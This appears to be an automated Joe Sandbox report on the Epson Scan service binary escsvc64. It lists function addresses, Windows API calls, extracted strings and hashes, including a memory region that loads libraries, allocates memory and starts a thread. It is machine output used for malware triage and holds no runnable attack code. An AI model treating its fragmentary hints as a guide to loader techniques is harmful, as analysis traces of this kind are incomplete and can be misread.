Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(000000014000645E,?,?,?,?,0000000140003447), ref: 000000014000764F
VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1

Strings

ntdl, xrefs: 00000001400075FF
l, xrefs: 0000000140007609

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: l$ntdl
API String ID: 2087232378-924918826
Opcode ID: 0e4d7604a2b929d53cc1f1856375e7947663ec15530bb6538b89027d8cfb31b4
Instruction ID: 082983da74dfe290379792d1b3382f9732f054a55705ee5756d289afdac720fd
Opcode Fuzzy Hash: 0e4d7604a2b929d53cc1f1856375e7947663ec15530bb6538b89027d8cfb31b4
Instruction Fuzzy Hash: E94128A27106E48ADB15CF2BA840BDD2B55E75AFC0F449016FF4E1BB56CA3CC542C710

Function 0000000180001C10 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StartServiceCtrlDispatcherW.ADVAPI32 ref: 0000000180001C51

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CtrlDispatcherServiceStart
String ID:
API String ID: 3789849863-0
Opcode ID: 43184d67f14c20715f7b26f6198189ae43bf3b66bb01ad773179d3671ebbb7a0
Instruction ID: b313e6faf4b91d82712c3ff4ec49ed76d19982d5675628aa87cac0bd1d38dc2e
Opcode Fuzzy Hash: 43184d67f14c20715f7b26f6198189ae43bf3b66bb01ad773179d3671ebbb7a0
Instruction Fuzzy Hash: DDF0DA31518E4C8FE781EF28C4997DA77E5F798311F818A2AF449C3250EF38D6848B42

Function 001F0570 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 326COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 001F08C2

Strings

, xrefs: 001F0630
z, xrefs: 001F05F0
5, xrefs: 001F0608
6, xrefs: 001F0638
i, xrefs: 001F0620
G, xrefs: 001F06CB
l, xrefs: 001F05F8
u, xrefs: 001F0628
a, xrefs: 001F0600
0, xrefs: 001F0610
(, xrefs: 001F0618
T, xrefs: 001F06D3
4, xrefs: 001F0640
M, xrefs: 001F05E8

Memory Dump Source

Source File: 00000000.00000003.1260253624.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd

Similarity

API ID: realloc
String ID: $($0$4$5$6$G$M$T$a$i$l$u$z
API String ID: 471065373-2079474088
Opcode ID: 7d012af2536f1f7d995bb6865e94ab2d39a3359b1312110b88a70488074df788
Instruction ID: 7ec3f774127c4727641ba4316498a8866575b2c65707d6e0a378af2f91f2380d
Opcode Fuzzy Hash: 7d012af2536f1f7d995bb6865e94ab2d39a3359b1312110b88a70488074df788
Instruction Fuzzy Hash: FBC1597061860C8FDF19DF64D8986EEBBE1FB98305F04412DE98ADB242DF70994ACB45

Function 001F01A0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 253libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 001F0257

Strings

user32.dll, xrefs: 001F022F
winh, xrefs: 001F01F2
msvcrt.dll, xrefs: 001F023C
l)$~, xrefs: 001F04F9
dll, xrefs: 001F0200
ttp., xrefs: 001F01F9

Memory Dump Source

Source File: 00000000.00000003.1260253624.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd

Similarity

API ID: LibraryLoad
String ID: dll$l)$~$msvcrt.dll$ttp.$user32.dll$winh
API String ID: 1029625771-1052611218
Opcode ID: f96e166d31e0664f72b86a40ea9ed61905039d2648656030012699a26d18f6a5
Instruction ID: 2ac9a726799ac48c0a130d3513529ae525e5b576e82550c3c3b86dc13fe0d0db
Opcode Fuzzy Hash: f96e166d31e0664f72b86a40ea9ed61905039d2648656030012699a26d18f6a5
Instruction Fuzzy Hash: 3791BCB0910B4C8FC791EFB4845939BBAE1FF5C380F608A19A19DD7726DF3998418B85

Function 0000000140006450 Relevance: 10.6, APIs: 7, Instructions: 65
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140007170: _initp_misc_winsig.LIBCMT ref: 00000001400071A9
Part of subcall function 0000000140007170: KiUserExceptionDispatcher.NTDLL ref: 00000001400071B1

Part of subcall function 0000000140007610: VirtualAlloc.KERNELBASE(000000014000645E,?,?,?,?,0000000140003447), ref: 000000014000764F
Part of subcall function 0000000140007610: VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1

FlsFree.KERNEL32(?,?,?,?,0000000140003447), ref: 000000014000646D
TlsFree.KERNEL32(?,?,?,?,0000000140003447), ref: 0000000140006488
FlsAlloc.KERNEL32(?,?,?,?,0000000140003447), ref: 00000001400064AB
FlsSetValue.KERNEL32(?,?,?,?,0000000140003447), ref: 00000001400064ED
GetCurrentThreadId.KERNEL32 ref: 0000000140006501
FlsFree.KERNEL32(?,?,?,?,0000000140003447), ref: 000000014000652B
TlsFree.KERNEL32(?,?,?,?,0000000140003447), ref: 0000000140006546

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Free$AllocVirtual$CurrentDispatcherExceptionThreadUserValue_initp_misc_winsig
String ID:
API String ID: 158422070-0
Opcode ID: 9195a0cd0be8c3569a83707636c05d213fc4554a45bd247ded46233fca8e8480
Instruction ID: cce0763aefef4587a24946a9f4ca3712f20a1716bcb15b54cc0025836c1ee2c2
Opcode Fuzzy Hash: 9195a0cd0be8c3569a83707636c05d213fc4554a45bd247ded46233fca8e8480
Instruction Fuzzy Hash: C431ECB0600A018AE65AEB7BB8583D93292AB4D7F5F980318F7765F2F1DF7D84468610

Function 001F0960 Relevance: 3.1, APIs: 2, Instructions: 117memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 001F0A70
CreateThread.KERNELBASE ref: 001F0AA4

Memory Dump Source

Source File: 00000000.00000003.1260253624.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1f0000_escsvc64.jbxd

Similarity

API ID: AllocCreateThreadVirtual
String ID:
API String ID: 3065189322-0
Opcode ID: 37883c71a4e1d3b3c6981b9ed2e9e665bf046d071fdbf6d9a47d73c2f0244c8d
Instruction ID: 13a11b2a975c384cb44c94f81c102f8a731fe8fbc20b8a548073b4f0e84c3545
Opcode Fuzzy Hash: 37883c71a4e1d3b3c6981b9ed2e9e665bf046d071fdbf6d9a47d73c2f0244c8d
Instruction Fuzzy Hash: 94414570608608CFCF58EF18C4887AD7BE2FB48758F00412DAD0EEB256DBB58958CB84

Function 0000000140007170 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140005E60: FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A

_initp_misc_winsig.LIBCMT ref: 00000001400071A9
KiUserExceptionDispatcher.NTDLL ref: 00000001400071B1

Part of subcall function 0000000140005D90: FlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DB0

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Value$DispatcherExceptionUser_initp_misc_winsig
String ID:
API String ID: 3398106669-0
Opcode ID: 2579abccdfdfa1ca2409a143a2b4d5cf1ae2fe72868da0f7081bba654f418bec
Instruction ID: e400128bdf60cb768f5461161da783887e2f7fea914d3257c31e6f2653dd6cfd
Opcode Fuzzy Hash: 2579abccdfdfa1ca2409a143a2b4d5cf1ae2fe72868da0f7081bba654f418bec
Instruction Fuzzy Hash: 2BF0AEF06A620640E90AFB637826BEA03808B8FBC1F4820317B0B0B2B39D3880404380

Function 0000000140008800 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(?,?,?,?,000000014000341C), ref: 0000000140008812
HeapSetInformation.KERNEL32 ref: 0000000140008841

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Heap$CreateInformation
String ID:
API String ID: 1774340351-0
Opcode ID: 2f3b07a5057123e73a3f5e291b1c4a5b22797b276520671a3e4f3cb1187edd10
Instruction ID: ce64bbf01f416f0299a489085bfe71602f84ad1ff6a2fcf5659d02faa047aa91
Opcode Fuzzy Hash: 2f3b07a5057123e73a3f5e291b1c4a5b22797b276520671a3e4f3cb1187edd10
Instruction Fuzzy Hash: 9CE048B5B1265082F7995B12AC49B9D6660F79C780F809019FB4D43764DF7DC1454B00

Function 0000000140007610 Relevance: 2.6, APIs: 2, Instructions: 69
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(000000014000645E,?,?,?,?,0000000140003447), ref: 000000014000764F
VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 89dea25f0bcc4f905972bf8608fe8dcd6de5403fdbd72f1580a36dc66a60dc05
Instruction ID: f65805860dc40e2b983aaf0f666c5c3de04cc8ec45c5f093d04358e3227d39e4
Opcode Fuzzy Hash: 89dea25f0bcc4f905972bf8608fe8dcd6de5403fdbd72f1580a36dc66a60dc05
Instruction Fuzzy Hash: A121F3637156E88BCF46CF2BA88469E2F15D75ABC4B04906AEE4E17B1AC938D186C710

Function 000000018000BBC0 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000000018000BBE0

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a1bfea3291010e4e8c9c942faa318457b8d813102347f83538f3b7a194bc6733
Instruction ID: 2f1e772e7f36b6363628d8cc3ae21d80d83d642b4dc8e669f90c229daf89f17f
Opcode Fuzzy Hash: a1bfea3291010e4e8c9c942faa318457b8d813102347f83538f3b7a194bc6733
Instruction Fuzzy Hash: 9BD0A73012160087E3089720EC857D6B294F788305F80011CF846C1180DB2C86D4C642

Function 00000001400076B0 Relevance: 1.3, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,?,?,?,0000000140003447), ref: 00000001400076E1

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 645e027d282d799c43ef8747a086244cde8df3e933449bd1787ac8c2826f5191
Instruction ID: 79d5dedfb32e33f50797cdffc4c50002341004bd1cd21fd5edceff188308d5b8
Opcode Fuzzy Hash: 645e027d282d799c43ef8747a086244cde8df3e933449bd1787ac8c2826f5191
Instruction Fuzzy Hash: 0AE0D8B3F145A801EB03CB2BE80076A1B40D389BE4F044012CE5A07B55C93DD8C3C724

Non-executed Functions

Function 0000000140001C90 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 233
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000140001D1D
RegQueryValueExW.ADVAPI32 ref: 0000000140001D59
RegCloseKey.ADVAPI32 ref: 0000000140001D6B
lstrlenW.KERNEL32 ref: 0000000140001DA0
RegOpenKeyExW.ADVAPI32 ref: 0000000140001E23
RegQueryValueExW.ADVAPI32 ref: 0000000140001E62
lstrlenW.KERNEL32 ref: 0000000140001EB4
RegCloseKey.ADVAPI32 ref: 0000000140001EC1
lstrlenW.KERNEL32 ref: 0000000140001ED7
RegOpenKeyExW.ADVAPI32 ref: 0000000140001F62
RegQueryValueExW.ADVAPI32 ref: 0000000140001FA1
lstrlenW.KERNEL32 ref: 0000000140001FF5
RegCloseKey.ADVAPI32 ref: 0000000140002002

Strings

EventNum, xrefs: 0000000140001D31
EventAppName, xrefs: 0000000140001E3B
EventAppPath, xrefs: 0000000140001F7A
%s,%d, xrefs: 0000000140002038
SOFTWARE\WOW6432Node\EPSON\EPSON Scan\%s, xrefs: 0000000140001CD2

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: lstrlen$CloseOpenQueryValue
String ID: %s,%d$EventAppName$EventAppPath$EventNum$SOFTWARE\WOW6432Node\EPSON\EPSON Scan\%s
API String ID: 2304643261-626936756
Opcode ID: 62891b438a3453a252617a46415941b0fbaf98d22866081e69189f8907fac70b
Instruction ID: 851eba2c86d670d338626dfcb874a6128995a4a42896a861548f75aefceaae5c
Opcode Fuzzy Hash: 62891b438a3453a252617a46415941b0fbaf98d22866081e69189f8907fac70b
Instruction Fuzzy Hash: 61A14DB2214B9191EB62CF26F4447EA73A4FBD8BC4F505125FB8947AA8EF79C109C700

Function 0000000140008E50 Relevance: 29.0, APIs: 19, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da54c64fb83bcbb0ce7322d2336a31bfe2eeecc11d53a15874d237ff8e356b4
Instruction ID: 616335567b3cd955fe8f98c99b09db664dae43f906a390fd336d3b9533428147
Opcode Fuzzy Hash: 4da54c64fb83bcbb0ce7322d2336a31bfe2eeecc11d53a15874d237ff8e356b4
Instruction Fuzzy Hash: 4922BFB2214A4186EB62CF27F8443EA77A1F789BC4F540116FB8A477B5EB7AC545CB00

Function 0000000140002090 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 144
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32 ref: 0000000140002112
lstrcpynW.KERNEL32 ref: 0000000140002154
lstrcmpiW.KERNEL32 ref: 00000001400021BF
lstrcmpiW.KERNEL32 ref: 00000001400021D9
lstrcmpiW.KERNEL32 ref: 00000001400021F3
lstrcmpiW.KERNEL32 ref: 0000000140002209
lstrcmpiW.KERNEL32 ref: 000000014000221F
SHGetFolderPathW.SHELL32 ref: 0000000140002243
SHGetFolderPathW.SHELL32 ref: 00000001400022B0
lstrlenW.KERNEL32 ref: 00000001400022E3

Strings

PROGx86_DIR, xrefs: 00000001400021E7
ProgramFiles(x86), xrefs: 0000000140002274
%s\%s, xrefs: 00000001400022C7
PROG_DIR, xrefs: 0000000140002213
WIN_DIR, xrefs: 00000001400021B3

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: lstrcmpi$FolderPathlstrlen$lstrcpyn
String ID: %s\%s$PROG_DIR$PROGx86_DIR$ProgramFiles(x86)$WIN_DIR
API String ID: 2656894383-2711514926
Opcode ID: 40ba0e74f043a88d633bd0d537ed384bec8f8e2864fd312c8e0aa503a1054268
Instruction ID: 7752ae9e4689017d9ad54f8639a9706760fd27286e3c0e01a1f653311e9c638a
Opcode Fuzzy Hash: 40ba0e74f043a88d633bd0d537ed384bec8f8e2864fd312c8e0aa503a1054268
Instruction Fuzzy Hash: 9C514E72218B81A1EB62DF62F4447DA63A5FB9C7C4F805025FB8947AB4EF79C549C700

Function 000000014000CF60 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140005E60: FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A

LoadLibraryA.KERNEL32 ref: 000000014000CFA2
GetProcAddress.KERNEL32 ref: 000000014000CFBE

Part of subcall function 0000000140005D90: FlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DB0

GetProcAddress.KERNEL32 ref: 000000014000CFE6

Part of subcall function 0000000140005D90: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000D595,?,?,?,000000014000970C), ref: 0000000140005DCB
Part of subcall function 0000000140005D90: GetModuleHandleA.KERNEL32 ref: 0000000140005DF2
Part of subcall function 0000000140005D90: GetProcAddress.KERNEL32 ref: 0000000140005E38

GetProcAddress.KERNEL32 ref: 000000014000D005
GetProcAddress.KERNEL32 ref: 000000014000D053
GetProcAddress.KERNEL32 ref: 000000014000D077

Part of subcall function 0000000140004A40: RtlCaptureContext.KERNEL32 ref: 0000000140004A51
Part of subcall function 0000000140004A40: IsDebuggerPresent.KERNEL32 ref: 0000000140004A95
Part of subcall function 0000000140004A40: SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004A9F
Part of subcall function 0000000140004A40: UnhandledExceptionFilter.KERNEL32 ref: 0000000140004AAA
Part of subcall function 0000000140004A40: GetCurrentProcess.KERNEL32 ref: 0000000140004AC0
Part of subcall function 0000000140004A40: TerminateProcess.KERNEL32 ref: 0000000140004ACE

Part of subcall function 0000000140005F50: FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70

Part of subcall function 0000000140005F50: GetModuleHandleA.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F8B
Part of subcall function 0000000140005F50: GetModuleHandleA.KERNEL32 ref: 0000000140005FB2
Part of subcall function 0000000140005F50: GetProcAddress.KERNEL32 ref: 0000000140005FF8

Strings

MessageBoxA, xrefs: 000000014000CFB4
GetLastActivePopup, xrefs: 000000014000CFF4
GetActiveWindow, xrefs: 000000014000CFD5
GetProcessWindowStation, xrefs: 000000014000D06D
GetUserObjectInformationA, xrefs: 000000014000D049
USER32.DLL, xrefs: 000000014000CF9B

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressProc$HandleModule$Value$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerLibraryLoadPresentTerminate
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3160505718-232180764
Opcode ID: fadb4bf039c24c9ffc6cabc9b48688cb4110fbf93598bb5f256590db30fcdbee
Instruction ID: 055fb55905cb7df163c1d96a02b24be9108de682761868c3bff01f0b1f6f2f83
Opcode Fuzzy Hash: fadb4bf039c24c9ffc6cabc9b48688cb4110fbf93598bb5f256590db30fcdbee
Instruction Fuzzy Hash: CC5150B1205B5190FEA6EB23B8547E633A5AB8DBC0F484026BF5D477B5EF39C5458320

Function 0000000140001890 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 50servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400018A0
OpenServiceW.ADVAPI32 ref: 00000001400018C7
ControlService.ADVAPI32 ref: 00000001400018E4
Sleep.KERNEL32 ref: 00000001400018F3
QueryServiceStatus.ADVAPI32 ref: 0000000140001903
Sleep.KERNEL32 ref: 000000014000191E
QueryServiceStatus.ADVAPI32 ref: 000000014000192E
DeleteService.ADVAPI32 ref: 000000014000193B
CloseServiceHandle.ADVAPI32 ref: 0000000140001944
CloseServiceHandle.ADVAPI32 ref: 000000014000194D

Strings

EpsonScanSvc, xrefs: 00000001400018B2

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Service$CloseHandleOpenQuerySleepStatus$ControlDeleteManager
String ID: EpsonScanSvc
API String ID: 2902594379-1444984947
Opcode ID: 44616b00be484275717ae0b3628ae0871233172b93312570258cad8b29c10706
Instruction ID: 159409440c7146a6a51766acc4e85108adb0bebee236ff060b2e696b6dd3abf8
Opcode Fuzzy Hash: 44616b00be484275717ae0b3628ae0871233172b93312570258cad8b29c10706
Instruction Fuzzy Hash: 4E11F87434175182FB979F23BC547E823A1AB8DBD1F485028BA4E4B3B4DE7AC289C710

Function 0000000140001460 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 99registryCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 0000000140001481
CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400014A3
RegisterDeviceNotificationW.USER32 ref: 0000000140001528
SetServiceStatus.ADVAPI32 ref: 000000014000156E
WaitForMultipleObjects.KERNEL32 ref: 00000001400015A8
UnregisterDeviceNotification.USER32 ref: 00000001400015C9
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015E0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015FC

Strings

, xrefs: 00000001400014EA
+/bad allocation, xrefs: 0000000140001518

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: CloseCreateDeviceEventHandleNotification$MultipleObjectsRegisterServiceStatusUnregisterWait
String ID: $+/bad allocation
API String ID: 297913478-685527123
Opcode ID: c6c6b533b63b5dd4e8371b5c67f0a56d84ec37e9fa0e94d4644b6e4d1ac1c462
Instruction ID: 7b25ca7211ab2d744b303caa1e776991c17dcff937dd20356167c5d69d76a0e3
Opcode Fuzzy Hash: c6c6b533b63b5dd4e8371b5c67f0a56d84ec37e9fa0e94d4644b6e4d1ac1c462
Instruction Fuzzy Hash: 8E41C4B1615A518BEB52CF6AF840B9A7BF4F78C784F145119FB9E8B674DB7AC0048B00

Function 0000000140001080 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 96COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00000001400010BA
CommandLineToArgvW.SHELL32 ref: 00000001400010C8
LocalFree.KERNEL32 ref: 0000000140001184
StartServiceCtrlDispatcherW.ADVAPI32 ref: 00000001400011D9
GetLastError.KERNEL32 ref: 00000001400011E3

Strings

/START, xrefs: 000000014000111C
/REMOVE, xrefs: 0000000140001135
